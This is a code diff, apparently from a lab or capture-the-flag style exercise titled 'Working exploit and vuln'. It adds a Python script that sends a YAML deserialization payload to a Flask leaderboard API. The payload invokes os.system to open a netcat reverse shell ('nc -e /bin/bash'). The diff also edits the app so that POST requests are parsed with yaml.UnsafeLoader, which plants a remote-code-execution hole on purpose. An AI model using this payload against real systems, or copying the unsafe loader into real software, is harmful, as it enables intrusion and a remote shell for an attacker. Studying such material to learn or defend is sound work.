Working exploit and vuln

exploit.py

@@ -0,0 +1,11 @@
+import requests
+
+malicious_yaml = """
+!!python/object/apply:os.system ["nc -e /bin/bash 127.0.0.1 1111"]
+"""
+url = "http://127.0.0.1:8080/api/leaderboard"
+headers = {
+    "Content-Type": "text/yaml"
+}
+response = requests.post(url, headers=headers, data=malicious_yaml)
+print(response.text)

flask_base/app.py

@@ -13,17 +13,27 @@ if not os.path.exists(LEADERBOARD_FILE):
 
 def read_leaderboard():
     with open(LEADERBOARD_FILE, 'r') as f:
-        return yaml.load(f, Loader=yaml.UnsafeLoader) or []
+        return yaml.safe_load(f) or []
 
 def write_leaderboard(data):
+    print(data)
     with open(LEADERBOARD_FILE, 'w') as f:
         yaml.safe_dump(data, f)
 
 @app.route('/api/leaderboard', methods=['POST'])
 def add_to_leaderboard():
+    if request.content_type == 'text/yaml' or request.content_type == 'application/yaml':
+        try:
+            new_entry = yaml.load(request.data, Loader=yaml.UnsafeLoader)
+        except yaml.YAMLError:
+            return jsonify({'error': 'Invalid YAML format'}), 400
+    else:
         new_entry = request.json
+
+    print(new_entry)
     if not new_entry or 'name' not in new_entry or 'score' not in new_entry:
         return jsonify({'error': 'Name and score are required'}), 400
+
     leaderboard = read_leaderboard()
     leaderboard.append(new_entry)
     write_leaderboard(leaderboard)